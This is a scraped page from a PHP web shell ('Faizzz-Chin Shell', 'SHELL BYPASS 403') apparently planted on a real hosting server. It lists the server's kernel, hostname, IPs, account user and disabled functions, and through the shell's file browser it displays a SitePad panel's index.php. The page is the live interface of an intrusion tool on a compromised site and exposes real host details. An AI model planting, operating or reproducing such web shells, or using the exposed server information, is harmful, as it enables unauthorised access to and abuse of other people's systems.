SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /usr/local/sitepad/lib/panels/pdadmin/ [ drwxr-xr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.28 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.114
Date Time: 2025-07-11 18:47:00
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : index.php
<?php

/* error_reporting(E_ALL);
ini_set('display_errors', E_ALL); */

//header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
//header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); // Date in the past
//header("Content-Type: text/html; charset=UTF-8");

if(!function_exists('shell_exec')){
	die('shell_exec function is required for SitePad to work.');
}

$array = array();
$array['SERVER'] = $_SERVER;
$array['POST'] = $_POST;
$array['GET'] = $_GET;
$array['REQUEST'] = $_REQUEST;
$array['COOKIE'] = $_COOKIE;

$sess = md5(uniqid(microtime()));
$file = "/var/sitetmp/".$sess;
$fp = fopen($file, "a");

if(empty($fp)){
	die('Could not write SESSION DATA.');
}

fwrite($fp, serialize($array));
fclose($fp);

//echo '/usr/local/sitepad/bin/soft '.$sess;die();
echo shell_exec('/usr/local/sitepad/bin/soft '.$sess);
@unlink($file); // load.php will also try to delete it!

// Just to ensure that there should not be any files as a security measures.
$d = date('i');
if($d % 2 == 0){
	
	if ($dh = opendir('/var/sitetmp/')) {
		
		while (($dfile = readdir($dh)) !== false) {
			if($dfile == '.' || $dfile == '..') continue;
			
			clearstatcache();
			$stime = filemtime('/var/sitetmp/'.$dfile);

			// Delete the file if its there for more than 10 seconds
			if($stime < (time() - 10)){
				@unlink('/var/sitetmp/'.$dfile);
			}
		}
		
		closedir($dh);
	}
}
© 2025 Faizzz-Chin